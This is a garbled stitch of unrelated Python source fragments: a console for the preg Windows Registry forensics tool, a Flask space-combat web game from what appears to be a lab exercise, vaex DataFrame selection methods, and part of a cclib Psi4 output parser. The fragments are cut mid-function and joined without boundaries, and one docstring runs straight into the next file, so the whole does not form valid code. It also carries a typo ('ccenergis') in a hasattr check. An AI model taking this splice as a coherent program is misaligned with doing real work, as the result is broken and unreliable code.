self.output_writer.Write(
'Unable to change to key: {0:s}\n'.format(key_path))
return
sanitized_path = self._SanitizeKeyPath(registry_key.path)
self.console.SetPrompt(
registry_file_path=registry_helper.path,
prepend_string=sanitized_path)
@magic.line_magic('hive')
def HiveActions(self, line):
"""Handles the hive actions.
Args:
      line (str): command line provided via the console.
"""
if line.startswith('list'):
self._HiveActionList(line)
elif line.startswith('open ') or line.startswith('load '):
self._HiveActionOpen(line)
elif line.startswith('scan'):
self._HiveActionScan(line)
@magic.line_magic('ls')
def ListDirectoryContent(self, line):
"""List all subkeys and values of the current key.
Args:
      line (str): command line provided via the console.
"""
    if not self.console or not self.console.IsLoaded():
return
if 'true' in line.lower():
verbose = True
elif '-v' in line.lower():
verbose = True
else:
verbose = False
sub = []
current_file = self.console.current_helper
if not current_file:
return
current_key = current_file.GetCurrentRegistryKey()
for key in current_key.GetSubkeys():
# TODO: move this construction into a separate function in OutputWriter.
time_string = timelib.Timestamp.CopyToIsoFormat(
key.last_written_time.GetPlasoTimestamp())
time_string, _, _ = time_string.partition('.')
sub.append(('{0:>19s} {1:>15s} {2:s}'.format(
time_string.replace('T', ' '), '[KEY]',
key.name), True))
for value in current_key.GetValues():
if not verbose:
sub.append(('{0:>19s} {1:>14s}] {2:s}'.format(
'', '[' + value.data_type_string, value.name), False))
else:
if value.DataIsString():
value_string = value.GetDataAsObject()
elif value.DataIsInteger():
value_string = '{0:d}'.format(value.GetDataAsObject())
elif value.DataIsMultiString():
value_string = '{0:s}'.format(''.join(value.GetDataAsObject()))
elif value.DataIsBinaryData():
value_string = hexdump.Hexdump.FormatData(
value.data, maximum_data_size=16)
else:
value_string = ''
sub.append((
'{0:>19s} {1:>14s}] {2:<25s} {3:s}'.format(
'', '[' + value.data_type_string, value.name, value_string),
False))
for entry, subkey in sorted(sub):
if subkey:
self.output_writer.Write('dr-xr-xr-x {0:s}\n'.format(entry))
else:
self.output_writer.Write('-r-xr-xr-x {0:s}\n'.format(entry))
@magic.line_magic('parse')
def ParseCurrentKey(self, line):
"""Parse the current key.
Args:
      line (str): command line provided via the console.
"""
    if not self.console or not self.console.IsLoaded():
return
if 'true' in line.lower():
verbose = True
elif '-v' in line.lower():
verbose = True
else:
verbose = False
current_helper = self.console.current_helper
if not current_helper:
return
current_key = current_helper.GetCurrentRegistryKey()
parsed_data = self.console.preg_tool.ParseRegistryKey(
current_key, current_helper)
self.console.preg_tool.PrintParsedRegistryKey(
parsed_data, file_entry=current_helper.file_entry, show_hex=verbose)
# Print a hexadecimal representation of all binary values.
if verbose:
header_shown = False
current_key = current_helper.GetCurrentRegistryKey()
for value in current_key.GetValues():
if not value.DataIsBinaryData():
continue
if not header_shown:
table_view = cli_views.CLITableView(
title='Hexadecimal representation')
header_shown = True
else:
table_view = cli_views.CLITableView()
table_view.AddRow(['Attribute', value.name])
table_view.Write(self.output_writer)
self.console.preg_tool.PrintSeparatorLine()
self.console.preg_tool.PrintSeparatorLine()
value_string = hexdump.Hexdump.FormatData(value.data)
self.output_writer.Write(value_string)
self.output_writer.Write('\n')
self.output_writer.Write('+-'*40)
self.output_writer.Write('\n')
@magic.line_magic('plugin')
def ParseWithPlugin(self, line):
"""Parses a Windows Registry key using a specific plugin.
Args:
      line (str): command line provided via the console.
"""
    if not self.console or not self.console.IsLoaded():
self.output_writer.Write('No hive loaded, unable to parse.\n')
return
current_helper = self.console.current_helper
if not current_helper:
return
if not line:
self.output_writer.Write('No plugin name added.\n')
return
plugin_name = line
if '-h' in line:
items = line.split()
if len(items) != 2:
self.output_writer.Write('Wrong usage: plugin [-h] PluginName\n')
return
if items[0] == '-h':
plugin_name = items[1]
else:
plugin_name = items[0]
registry_file_type = current_helper.file_type
registry_plugin_list = self.console.preg_tool.GetWindowsRegistryPlugins()
plugin_object = registry_plugin_list.GetPluginObjectByName(
registry_file_type, plugin_name)
if not plugin_object:
self.output_writer.Write(
'No plugin named: {0:s} available for Registry type {1:s}\n'.format(
plugin_name, registry_file_type))
return
key_paths = plugin_list.PluginList.GetKeyPathsFromPlugin(plugin_object)
if not key_paths:
self.output_writer.Write(
'Plugin: {0:s} has no key information.\n'.format(line))
return
if '-h' in line:
self._PrintPluginHelp(plugin_object)
return
for key_path in key_paths:
registry_key = current_helper.GetKeyByPath(key_path)
if not registry_key:
self.output_writer.Write('Key: {0:s} not found\n'.format(key_path))
continue
# Move the current location to the key to be parsed.
self.ChangeDirectory(key_path)
# Parse the key.
current_key = current_helper.GetCurrentRegistryKey()
parsed_data = self.console.preg_tool.ParseRegistryKey(
current_key, current_helper, use_plugins=[plugin_name])
self.console.preg_tool.PrintParsedRegistryKey(
parsed_data, file_entry=current_helper.file_entry)
@magic.line_magic('pwd')
def PrintCurrentWorkingDirectory(self, unused_line):
"""Print the current path.
Args:
      line (str): command line provided via the console.
"""
    if not self.console or not self.console.IsLoaded():
return
current_helper = self.console.current_helper
if not current_helper:
return
self.output_writer.Write('{0:s}\n'.format(
current_helper.GetCurrentRegistryPath()))
class PregConsole(object):
"""Preg iPython console."""
_BASE_FUNCTIONS = [
('cd key', 'Navigate the Registry like a directory structure.'),
('ls [-v]', (
'List all subkeys and values of a Registry key. If called as ls '
'True then values of keys will be included in the output.')),
    ('parse [-v]', 'Parse the current key using all plugins.'),
('plugin [-h] plugin_name', (
'Run a particular key-based plugin on the loaded hive. The correct '
'Registry key will be loaded, opened and then parsed.')),
('get_value value_name', (
'Get a value from the currently loaded Registry key.')),
('get_value_data value_name', (
'Get a value data from a value stored in the currently loaded '
'Registry key.')),
('get_key', 'Return the currently loaded Registry key.')]
@property
def current_helper(self):
"""The currently loaded Registry helper."""
return self._currently_registry_helper
def __init__(self, tool):
"""Initialize a console.
Args:
tool (PregTool): preg tool.
"""
super(PregConsole, self).__init__()
self._currently_registry_helper = None
self._currently_loaded_helper_path = ''
self._registry_helpers = {}
preferred_encoding = locale.getpreferredencoding()
if not preferred_encoding:
preferred_encoding = 'utf-8'
# TODO: Make this configurable, or derive it from the tool.
self._output_writer = cli_tools.StdoutOutputWriter(
encoding=preferred_encoding)
self.preg_tool = tool
def _CommandGetCurrentKey(self):
"""Retreives the currently loaded Registry key.
Returns:
dfwinreg.WinRegistryKey: currently loaded Registry key or None if
not available.
"""
return self._currently_registry_helper.GetCurrentRegistryKey()
def _CommandGetValue(self, value_name):
"""Retrieves a value from the currently loaded Windows Registry key.
Args:
value_name (str): name of the value to be retrieved.
Returns:
dfwinreg.WinRegistryValue: a Windows Registry value, or None if not
available.
"""
current_key = self._currently_registry_helper.GetCurrentRegistryKey()
if current_key:
return current_key.GetValueByName(value_name)
def _CommandGetValueData(self, value_name):
"""Retrieves a value data from the currently loaded Windows Registry key.
Args:
value_name (str): name of the value to be retrieved.
Returns:
      object: Windows Registry value data, or None if not available.
# Lab6/game.py
#!/usr/bin/python
from flask import Flask, redirect, render_template, request
from random import randint
app = Flask(__name__)
app.secret_key = '<KEY>'
health = 20
power = 0
weapons = {'missile' : 2, 'burst' : 1}#, 'ion' : 3, 'flak' : 9}
money = 20
location = 1
state = 0
stopped = 0
enemy = {'health' : 10, 'stopped' : 0, 'weapons' : {'missile' : 3, 'burst' : 2, 'ion' : -1, 'flak' : -1}, 'reward' : 20}
travel = {1 : {' UP ' : '2', ' DOWN ' : '4'},
2 : {' NEXT ' : '3', ' BACK ' : '1'},
3 : {' NEXT ' : '7', ' BACK ' : '2'},
4 : {' UP ' : '5', ' DOWN ' : '6', ' BACK ' : '1'},
5 : {' NEXT ' : '7', ' BACK ' : '4'},
6 : {' NEXT ' : '8', ' BACK ' : '4'},
7 : {' NEXT ' : '9', ' BACK TOP ' : '3', ' BACK BOT ' : '5'},
8 : {' NEXT ' : '9', ' BACK ' : '6'},
9 : {' NEXT ' : '10', ' BACK TOP ' : '7', ' BACK BOT ' : '8'},
10 : {' END ' : '10'}}
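# Map graph: location -> {button label: destination}; locations 1-10 form
# branching routes that reconverge at sector 9 before the final sector 10.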
done = {2 : False, 3 : False, 4 : False, 5 : False, 6 : False, 7 : False, 8 : False, 9 : False}
CLOSEPOPPUP = 'javascript:void(document.getElementById("message").style.display="none");'
def renderGame(title, content, options):
return render_template('game/game.html', title=title, location=location, symbol='*', health=health, power=power//2, destinations=travel[location],weapons=weapons , money=money, content=content, options=options)
def incrementCooldown():
global power
global stopped
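    # Advance one turn: count down both sides' weapon cooldowns, recharge
    # ship power (capped at 20), and tick down any ion-disable timers.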
for key in weapons:
if (weapons[key] > 0):
weapons[key] = weapons[key] - 1
for key in enemy['weapons']:
if (enemy['weapons'][key] > 0):
enemy['weapons'][key] = enemy['weapons'][key] - 1
if (power < 20):
power = power + 1
if (stopped > 0):
stopped = stopped - 1
if (enemy['stopped'] > 0):
enemy['stopped'] = enemy['stopped'] - 1
def initBattle(enabled):
if (enabled == True):
for key in weapons:
if (key == 'missile'):
weapons[key] = 2
if (key == 'burst'):
weapons[key] = 1
if (key == 'ion'):
weapons[key] = 3
if (key == 'flak'):
weapons[key] = 9
else:
for key in weapons:
weapons[key] = -1
def battle(action):
global health
global state
global stopped
global location
global money
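    # Resolve one combat round: fire the player's chosen weapon unless the ship
    # is ion-disabled, then let the enemy answer with the first off-cooldown
    # weapon that wins a coin flip.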
text = ''
title = ''
options = {'Close' : CLOSEPOPPUP}
if (stopped == 0):
if (action == 'missile'):
text = text + 'Your pegasus missile landed and dealt two damage to the enemy hull. '
enemy['health'] = enemy['health'] - 2
weapons['missile'] = 2
if (action == 'burst'):
random = randint(0, 3)
text = text + 'Your burst lasers dealt ' + {0:'zero',1:'one',2:'two',3:'three'}[random] + ' damage to the enemy hull. '
enemy['health'] = enemy['health'] - random
weapons['burst'] = 1
if (action == 'ion'):
random = randint(1, 3)
if (random > 1):
text = text + 'Your heavy ion blaster hit and disabled the enemy for a bit. '
enemy['stopped'] = random
else:
text = text + 'Your heavy ion blaster missed. '
weapons['ion'] = 3
if (action == 'flak'):
random = randint(1, 2)
text = text + 'Your flak gun dealt ' + {1:'seven',2:'fourteen'}[random] + ' damage to the enemy hull. '
enemy['health'] = enemy['health'] - (7 * random)
weapons['flak'] = 9
else:
text = text + 'You are still disabled from the enemy ion blast. '
if (enemy['stopped'] == 0):
if (enemy['weapons']['missile'] == 0 and randint(0,1) == 1):
            text = text + 'The enemy pegasus missile landed and dealt two damage to your hull. '
enemy['weapons']['missile'] = 3
health = health - 2
elif (enemy['weapons']['burst'] == 0 and randint(0,1) == 1):
random = randint(0, 2)
text = text + 'The enemy lasers dealt ' + {0:'zero',1:'one',2:'two'}[random] + ' damage to your hull. '
health = health - random
enemy['weapons']['burst'] = 2
elif (enemy['weapons']['ion'] == 0 and randint(0,1) == 1):
random = randint(0, 2)
if (random > 0):
                text = text + 'The enemy heavy ion blaster hit and disabled you for a bit. '
else:
text = text + 'The enemy heavy ion blaster fired, but missed. '
stopped = random
enemy['weapons']['ion'] = 4
elif (enemy['weapons']['flak'] == 0 and randint(0,1) == 1):
random = randint(1, 2)
text = text + 'The enemy flak gun dealt ' + {1:'four',2:'eight'}[random] + ' damage to your hull. '
health = health - (4 * random)
            enemy['weapons']['flak'] = 10
else:
text = text + 'The enemy is still disabled from the ion blast. '
if (enemy['health'] < 1):
state = 2
done[location] = True
money = money + enemy['reward']
return renderGame(title, text, options)
def read():
global power
global state
global enemy
global health
global money
if (location == 1):
initBattle(False)
power = 20
title = 'Slower Than Light!'
        content = 'You load into a game that seems strangely familiar to <a href="https://www.gog.com/game/faster_than_light">another game</a> but you quickly realise that that would be silly, because no one would rip-off <a href="http://store.steampowered.com/app/212680/FTL_Faster_Than_Light/">another game</a> so shamelessly without attribution. If there was a fantastic <a href="https://itunes.apple.com/us/app/ftl-faster-than-light/id833951143?mt=8">indie game</a> like this, (which there <a href="https://www.humblebundle.com/store/ftl-faster-than-light">totally isn\'t</a>) it would definitely be more interesting than this anyways. This web game, which looks quite similar to the author\'s previous works, throws you directly into the action by telling you that you are piloting a ship with critical information gathered by spies that would help the resistance a lot. With the Galactic Federation hot on your tail, you must reach home-base quickly. Jump to the next point.'
options = {'Embark' : CLOSEPOPPUP}
return renderGame(title, content, options)
elif (location == 2):
if (state == 2):
initBattle(False)
power = 20
title = 'Victory! | Slower Than Light!'
content = 'Your final shot flies into the drone. A small puff of gas shoots out of its exhaust before the drone explodes into a massive cloud of metal and gas. You grab $20 out of the wreckage. This sector should be clear. Our journey has only just started and we have many more trials ahead of us.'
options = {'Close' : CLOSEPOPPUP}
return renderGame(title, content, options)
elif (state == 3):
initBattle(False)
power = 20
title = 'Sector 2 | Slower Than Light!'
content = 'The sector is completely empty. No life can be found. Some of the debris from the scout is still floating around.'
options = {'Close' : CLOSEPOPPUP}
return renderGame(title, content, options)
else:
initBattle(True)
power = 0
enemy = {'health' : 10, 'stopped' : 0, 'weapons' : {'missile' : 3, 'burst' : 2, 'ion' : -1, 'flak' : -1}, 'reward' : 20}
title = 'Scout Drone | Slower Than Light!'
        content = 'After that confusing introduction and totally not cliche "start with forked paths" deal out of the way, you scan around the system you just jumped to. Your scanners quickly notice a Federation drone scout about three AU away. You can\'t let the Federation find you. Destroy that ship.'
options = {'Ready the Guns!' : '?action=pass'}
state = 1
return renderGame(title, content, options)
elif (location == 3):
if (state == 2):
initBattle(False)
power = 20
title = 'Victory! | Slower Than Light!'
            content = 'The hull of the fighter suddenly rips open and the ship implodes on itself. You feel tempted to search the wreckage for any intel or weapons, but out of fear for more ships warping in, you grab $15 and get going.'
options = {'Close' : CLOSEPOPPUP}
return renderGame(title, content, options)
elif (state == 3):
initBattle(False)
power = 20
title = 'Sector 3 | Slower Than Light!'
            content = 'The sector remains quiet. You hurry past the planet that the fighter warped to out of fear that more might be coming.'
options = {'Close' : CLOSEPOPPUP}
return renderGame(title, content, options)
else:
initBattle(True)
power = 0
enemy = {'health' : 8, 'stopped' : 0, 'weapons' : {'missile' : 2, 'burst' : 1, 'ion' : 3, 'flak' : -1}, 'reward' : 15}
title = 'Federation Fighter | Slower Than Light!'
:param str boolean_expression: Any valid column expression, with comparison operators
:param str mode: Possible boolean operator: replace/and/or/xor/subtract
:param str name: history tree or selection 'slot' to use
:param executor:
:return:
"""
boolean_expression = _ensure_string_from_expression(boolean_expression)
if boolean_expression is None and not self.has_selection(name=name):
pass # we don't want to pollute the history with many None selections
self.signal_selection_changed.emit(self, name) # TODO: unittest want to know, does this make sense?
else:
def create(current):
return selections.SelectionExpression(boolean_expression, current, mode) if boolean_expression else None
self._selection(create, name)
def select_non_missing(self, drop_nan=True, drop_masked=True, column_names=None, mode="replace", name="default"):
"""Create a selection that selects rows having non missing values for all columns in column_names.
The name reflects Pandas, no rows are really dropped, but a mask is kept to keep track of the selection
:param drop_nan: drop rows when there is a NaN in any of the columns (will only affect float values)
:param drop_masked: drop rows when there is a masked value in any of the columns
:param column_names: The columns to consider, default: all (real, non-virtual) columns
:param str mode: Possible boolean operator: replace/and/or/xor/subtract
:param str name: history tree or selection 'slot' to use
:return:
"""
column_names = column_names or self.get_column_names(virtual=False)
def create(current):
return selections.SelectionDropNa(drop_nan, drop_masked, column_names, current, mode)
self._selection(create, name)
def dropmissing(self, column_names=None):
"""Create a shallow copy of a DataFrame, with filtering set using ismissing.
:param column_names: The columns to consider, default: all (real, non-virtual) columns
:rtype: DataFrame
"""
return self._filter_all(self.func.ismissing, column_names)
def dropnan(self, column_names=None):
"""Create a shallow copy of a DataFrame, with filtering set using isnan.
:param column_names: The columns to consider, default: all (real, non-virtual) columns
:rtype: DataFrame
"""
return self._filter_all(self.func.isnan, column_names)
def dropna(self, column_names=None):
"""Create a shallow copy of a DataFrame, with filtering set using isna.
:param column_names: The columns to consider, default: all (real, non-virtual) columns
:rtype: DataFrame
"""
return self._filter_all(self.func.isna, column_names)
def dropinf(self, column_names=None):
""" Create a shallow copy of a DataFrame, with filtering set using isinf.
:param column_names: The columns to consider, default: all (real, non-virtual) columns
:rtype: DataFrame
"""
return self._filter_all(self.func.isinf, column_names)
def _filter_all(self, f, column_names=None):
column_names = column_names or self.get_column_names(virtual=False)
expression = f(self[column_names[0]])
for column in column_names[1:]:
expression = expression | f(self[column])
return self.filter(~expression, mode='and')
def select_nothing(self, name="default"):
"""Select nothing."""
logger.debug("selecting nothing")
self.select(None, name=name)
self.signal_selection_changed.emit(self, name)
def select_rectangle(self, x, y, limits, mode="replace", name="default"):
"""Select a 2d rectangular box in the space given by x and y, bounded by limits.
Example:
        >>> df.select_rectangle('x', 'y', [(0, 10), (0, 1)])
:param x: expression for the x space
        :param y: expression for the y space
:param limits: sequence of shape [(x1, x2), (y1, y2)]
:param mode:
"""
self.select_box([x, y], limits, mode=mode, name=name)
def select_box(self, spaces, limits, mode="replace", name="default"):
"""Select a n-dimensional rectangular box bounded by limits.
The following examples are equivalent:
>>> df.select_box(['x', 'y'], [(0, 10), (0, 1)])
>>> df.select_rectangle('x', 'y', [(0, 10), (0, 1)])
:param spaces: list of expressions
:param limits: sequence of shape [(x1, x2), (y1, y2)]
:param mode:
:param name:
:return:
"""
sorted_limits = [(min(l), max(l)) for l in limits]
expressions = ["((%s) >= %f) & ((%s) <= %f)" % (expression, lmin, expression, lmax) for
(expression, (lmin, lmax)) in zip(spaces, sorted_limits)]
self.select("&".join(expressions), mode=mode, name=name)
def select_circle(self, x, y, xc, yc, r, mode="replace", name="default", inclusive=True):
"""
Select a circular region centred on xc, yc, with a radius of r.
Example:
>>> df.select_circle('x','y',2,3,1)
:param x: expression for the x space
:param y: expression for the y space
:param xc: location of the centre of the circle in x
:param yc: location of the centre of the circle in y
:param r: the radius of the circle
:param name: name of the selection
:param mode:
:return:
"""
# expr = "({x}-{xc})**2 + ({y}-{yc})**2 <={r}**2".format(**locals())
if inclusive:
expr = (self[x] - xc)**2 + (self[y] - yc)**2 <= r**2
else:
expr = (self[x] - xc)**2 + (self[y] - yc)**2 < r**2
self.select(boolean_expression=expr, mode=mode, name=name)
def select_ellipse(self, x, y, xc, yc, width, height, angle=0, mode="replace", name="default", radians=False, inclusive=True):
"""
Select an elliptical region centred on xc, yc, with a certain width, height
and angle.
Example:
>>> df.select_ellipse('x','y', 2, -1, 5,1, 30, name='my_ellipse')
:param x: expression for the x space
:param y: expression for the y space
:param xc: location of the centre of the ellipse in x
:param yc: location of the centre of the ellipse in y
:param width: the width of the ellipse (diameter)
        :param height: the height of the ellipse (diameter)
:param angle: (degrees) orientation of the ellipse, counter-clockwise
measured from the y axis
:param name: name of the selection
:param mode:
:return:
"""
# Computing the properties of the ellipse prior to selection
        if radians:
            alpha = angle
        else:
            alpha = np.deg2rad(angle)
xr = width / 2
yr = height / 2
r = max(xr, yr)
a = xr / r
b = yr / r
expr = "(({x}-{xc})*cos({alpha})+({y}-{yc})*sin({alpha}))**2/{a}**2 + (({x}-{xc})*sin({alpha})-({y}-{yc})*cos({alpha}))**2/{b}**2 <= {r}**2".format(**locals())
if inclusive:
expr = ((self[x] - xc) * np.cos(alpha) + (self[y] - yc) * np.sin(alpha))**2 / a**2 + ((self[x] - xc) * np.sin(alpha) - (self[y] - yc) * np.cos(alpha))**2 / b**2 <= r**2
else:
expr = ((self[x] - xc) * np.cos(alpha) + (self[y] - yc) * np.sin(alpha))**2 / a**2 + ((self[x] - xc) * np.sin(alpha) - (self[y] - yc) * np.cos(alpha))**2 / b**2 < r**2
self.select(boolean_expression=expr, mode=mode, name=name)
def select_lasso(self, expression_x, expression_y, xsequence, ysequence, mode="replace", name="default", executor=None):
"""For performance reasons, a lasso selection is handled differently.
:param str expression_x: Name/expression for the x coordinate
:param str expression_y: Name/expression for the y coordinate
:param xsequence: list of x numbers defining the lasso, together with y
:param ysequence:
:param str mode: Possible boolean operator: replace/and/or/xor/subtract
:param str name:
:param executor:
:return:
"""
def create(current):
return selections.SelectionLasso(expression_x, expression_y, xsequence, ysequence, current, mode)
self._selection(create, name, executor=executor)
def select_inverse(self, name="default", executor=None):
"""Invert the selection, i.e. what is selected will not be, and vice versa
:param str name:
:param executor:
:return:
"""
def create(current):
return selections.SelectionInvert(current)
self._selection(create, name, executor=executor)
def set_selection(self, selection, name="default", executor=None):
"""Sets the selection object
:param selection: Selection object
:param name: selection 'slot'
:param executor:
:return:
"""
def create(current):
return selection
self._selection(create, name, executor=executor, execute_fully=True)
def _selection(self, create_selection, name, executor=None, execute_fully=False):
"""select_lasso and select almost share the same code"""
selection_history = self.selection_histories[name]
previous_index = self.selection_history_indices[name]
current = selection_history[previous_index] if selection_history else None
selection = create_selection(current)
executor = executor or self.executor
selection_history.append(selection)
self.selection_history_indices[name] += 1
# clip any redo history
del selection_history[self.selection_history_indices[name]:-1]
self.signal_selection_changed.emit(self, name)
result = vaex.promise.Promise.fulfilled(None)
# logger.debug("select selection history is %r, index is %r", selection_history, self.selection_history_indices[name])
return result
def has_selection(self, name="default"):
"""Returns True if there is a selection with the given name."""
return self.get_selection(name) is not None
def __setitem__(self, name, value):
'''Convenient way to add a virtual column / expression to this DataFrame.
Example:
>>> import vaex, numpy as np
>>> df = vaex.example()
>>> df['r'] = np.sqrt(df.x**2 + df.y**2 + df.z**2)
>>> df.r
<vaex.expression.Expression(expressions='r')> instance at 0x121687e80 values=[2.9655450396553587, 5.77829281049018, 6.99079603950256, 9.431842752707537, 0.8825613121347967 ... (total 330000 values) ... 7.453831761514681, 15.398412491068198, 8.864250273925633, 17.601047186042507, 14.540181524970293]
'''
if isinstance(name, six.string_types):
if isinstance(value, supported_column_types):
self.add_column(name, value)
else:
self.add_virtual_column(name, value)
else:
raise TypeError('__setitem__ only takes strings as arguments, not {}'.format(type(name)))
def drop_filter(self, inplace=False):
"""Removes all filters from the DataFrame"""
df = self if inplace else self.copy()
df.select_nothing(name=FILTER_SELECTION_NAME)
df._invalidate_caches()
return df
def filter(self, expression, mode="and"):
"""General version of df[<boolean expression>] to modify the filter applied to the DataFrame.
See :func:`DataFrame.select` for usage of selection.
Note that using `df = df[<boolean expression>]`, one can only narrow the filter (i.e. only less rows
can be selected). Using the filter method, and a different boolean mode (e.g. "or") one can actually
cause more rows to be selected. This differs greatly from numpy and pandas for instance, which can only
narrow the filter.
Example:
>>> import vaex
>>> import numpy as np
>>> x = np.arange(10)
>>> df = vaex.from_arrays(x=x, y=x**2)
>>> df
# x y
0 0 0
1 1 1
2 2 4
      3  3    9
i in indices.split()]
if len(mocoeffs) < indices[-1]:
for i in range(len(indices)):
mocoeffs.append([])
else:
assert len(mocoeffs) == indices[-1]
self.skip_line(inputfile, 'blank')
n = len(indices)
line = next(inputfile)
while line.strip():
chomp = line.split()
m = len(chomp)
iao = int(chomp[0])
coeffs = [float(c) for c in chomp[m - n:]]
for i, c in enumerate(coeffs):
mocoeffs[indices[i]-1].append(c)
line = next(inputfile)
energies = next(inputfile)
symmetries = next(inputfile)
occupancies = next(inputfile)
self.skip_lines(inputfile, ['b', 'b'])
indices = next(inputfile)
if not hasattr(self, 'mocoeffs'):
self.mocoeffs = []
self.mocoeffs.append(mocoeffs)
# The formats for Mulliken and Lowdin atomic charges are the same, just with
# the name changes, so use the same code for both.
#
# Properties computed using the SCF density density matrix
# Mulliken Charges: (a.u.)
# Center Symbol Alpha Beta Spin Total
# 1 C 2.99909 2.99909 0.00000 0.00182
# 2 C 2.99909 2.99909 0.00000 0.00182
# ...
for pop_type in ["Mulliken", "Lowdin"]:
if line.strip() == "%s Charges: (a.u.)" % pop_type:
if not hasattr(self, 'atomcharges'):
self.atomcharges = {}
header = next(inputfile)
line = next(inputfile)
while not line.strip():
line = next(inputfile)
charges = []
while line.strip():
ch = float(line.split()[-1])
charges.append(ch)
line = next(inputfile)
self.atomcharges[pop_type.lower()] = charges
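                # After this block, self.atomcharges looks like, e.g.:
                #   {"mulliken": [0.00182, 0.00182, ...]}
                # with one value per atom, keyed by the lowercased population name.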
# This is for the older conventional MP2 code in 4.0b5.
mp_trigger = "MP2 Total Energy (a.u.)"
if line.strip()[:len(mp_trigger)] == mp_trigger:
self.metadata["methods"].append("MP2")
mpenergy = utils.convertor(float(line.split()[-1]), 'hartree', 'eV')
if not hasattr(self, 'mpenergies'):
self.mpenergies = []
self.mpenergies.append([mpenergy])
# This is for the newer DF-MP2 code in 4.0.
if 'DF-MP2 Energies' in line:
self.metadata["methods"].append("DF-MP2")
while 'Total Energy' not in line:
line = next(inputfile)
mpenergy = utils.convertor(float(line.split()[3]), 'hartree', 'eV')
if not hasattr(self, 'mpenergies'):
self.mpenergies = []
self.mpenergies.append([mpenergy])
# Note this is just a start and needs to be modified for CCSD(T), etc.
ccsd_trigger = "* CCSD total energy"
if line.strip()[:len(ccsd_trigger)] == ccsd_trigger:
self.metadata["methods"].append("CCSD")
ccsd_energy = utils.convertor(float(line.split()[-1]), 'hartree', 'eV')
if not hasattr(self, "ccenergis"):
self.ccenergies = []
self.ccenergies.append(ccsd_energy)
# The geometry convergence targets and values are printed in a table, with the legends
# describing the convergence annotation. Probably exact slicing of the line needs
# to be done in order to extract the numbers correctly. If there are no values for
        # a particular target it means they are not used (marked also with an 'o'), and in this case
# we will set a value of numpy.inf so that any value will be smaller.
#
# ==> Convergence Check <==
#
# Measures of convergence in internal coordinates in au.
# Criteria marked as inactive (o), active & met (*), and active & unmet ( ).
# ---------------------------------------------------------------------------------------------
# Step Total Energy Delta E MAX Force RMS Force MAX Disp RMS Disp
# ---------------------------------------------------------------------------------------------
# Convergence Criteria 1.00e-06 * 3.00e-04 * o 1.20e-03 * o
# ---------------------------------------------------------------------------------------------
# 2 -379.77675264 -7.79e-03 1.88e-02 4.37e-03 o 2.29e-02 6.76e-03 o ~
# ---------------------------------------------------------------------------------------------
#
if (self.section == "Convergence Check") and line.strip() == "==> Convergence Check <==" \
and not hasattr(self, 'finite_difference'):
if not hasattr(self, "optstatus"):
self.optstatus = []
self.optstatus.append(data.ccData.OPT_UNKNOWN)
self.skip_lines(inputfile, ['b', 'units', 'comment', 'dash+tilde', 'header', 'dash+tilde'])
# These are the position in the line at which numbers should start.
starts = [27, 41, 55, 69, 83]
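            # One start per convergence measure in the header above:
            # Delta E, MAX Force, RMS Force, MAX Disp, RMS Disp.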
criteria = next(inputfile)
geotargets = []
for istart in starts:
if criteria[istart:istart+9].strip():
geotargets.append(float(criteria[istart:istart+9]))
else:
geotargets.append(numpy.inf)
self.skip_line(inputfile, 'dashes')
values = next(inputfile)
step = int(values.split()[0])
geovalues = []
for istart in starts:
if values[istart:istart+9].strip():
geovalues.append(float(values[istart:istart+9]))
if step == 1:
self.optstatus[-1] += data.ccData.OPT_NEW
# This assertion may be too restrictive, but we haven't seen the geotargets change.
# If such an example comes up, update the value since we're interested in the last ones.
if not hasattr(self, 'geotargets'):
self.geotargets = geotargets
else:
assert self.geotargets == geotargets
if not hasattr(self, 'geovalues'):
self.geovalues = []
self.geovalues.append(geovalues)
# This message signals a converged optimization, in which case we want
# to append the index for this step to optdone, which should be equal
# to the number of geovalues gathered so far.
if "Optimization is complete!" in line:
# This is a workaround for Psi4.0/sample_opt-irc-2.out;
# IRC calculations currently aren't parsed properly for
# optimization parameters.
if hasattr(self, 'geovalues'):
if not hasattr(self, 'optdone'):
self.optdone = []
self.optdone.append(len(self.geovalues))
assert hasattr(self, "optstatus") and len(self.optstatus) > 0
self.optstatus[-1] += data.ccData.OPT_DONE
# This message means that optimization has stopped for some reason, but we
# still want optdone to exist in this case, although it will be an empty list.
if line.strip() == "Optimizer: Did not converge!":
if not hasattr(self, 'optdone'):
self.optdone = []
assert hasattr(self, "optstatus") and len(self.optstatus) > 0
self.optstatus[-1] += data.ccData.OPT_UNCONVERGED
        # The reference point at which properties are evaluated in Psi4 is explicitly stated,
        # so we can save it for later. It is not, however, a part of the Properties section,
        # but it appears before it and also in other places where properties that might depend
# on it are printed.
#
# Properties will be evaluated at 0.000000, 0.000000, 0.000000 Bohr
#
# OR
#
# Properties will be evaluated at 0.000000, 0.000000, 0.000000 [a0]
#
if "Properties will be evaluated at" in line.strip():
self.origin = numpy.array([float(x.strip(',')) for x in line.split()[-4:-1]])
assert line.split()[-1] in ["Bohr", "[a0]"]
self.origin = utils.convertor(self.origin, 'bohr', 'Angstrom')
# The properties section print the molecular dipole moment:
#
# ==> Properties <==
#
#
#Properties computed using the SCF density density matrix
# Nuclear Dipole Moment: (a.u.)
# X: 0.0000 Y: 0.0000 Z: 0.0000
#
# Electronic Dipole Moment: (a.u.)
# X: 0.0000 Y: 0.0000 Z: 0.0000
#
# Dipole Moment: (a.u.)
# X: 0.0000 Y: 0.0000 Z: 0.0000 Total: 0.0000
#
if (self.section == "Properties") and line.strip() == "Dipole Moment: (a.u.)":
line = next(inputfile)
dipole = numpy.array([float(line.split()[1]), float(line.split()[3]), float(line.split()[5])])
dipole = utils.convertor(dipole, "ebohr", "Debye")
if not hasattr(self, 'moments'):
# Old versions of Psi4 don't print the origin; assume
# it's at zero.
if not hasattr(self, 'origin'):
self.origin = numpy.array([0.0, 0.0, 0.0])
self.moments = [self.origin, dipole]
else:
try:
assert numpy.all(self.moments[1] == dipole)
except AssertionError:
self.logger.warning('Overwriting previous multipole moments with new values')
self.logger.warning('This could be from post-HF properties or geometry optimization')
self.moments = [self.origin, dipole]
# Higher multipole moments are printed separately, on demand, in lexicographical order.
#
# Multipole Moments:
#
# ------------------------------------------------------------------------------------
# Multipole Electric (a.u.) Nuclear (a.u.) Total (a.u.)
# ------------------------------------------------------------------------------------
#
# L = 1. Multiply by 2.5417462300 to convert to Debye
# Dipole X : 0.0000000 0.0000000 0.0000000
# Dipole Y : 0.0000000 0.0000000 0.0000000
# Dipole Z : 0.0000000 0.0000000 0.0000000
#
# L = 2. Multiply by 1.3450341749 to convert to Debye.ang
# Quadrupole XX : -1535.8888701 1496.8839996 -39.0048704
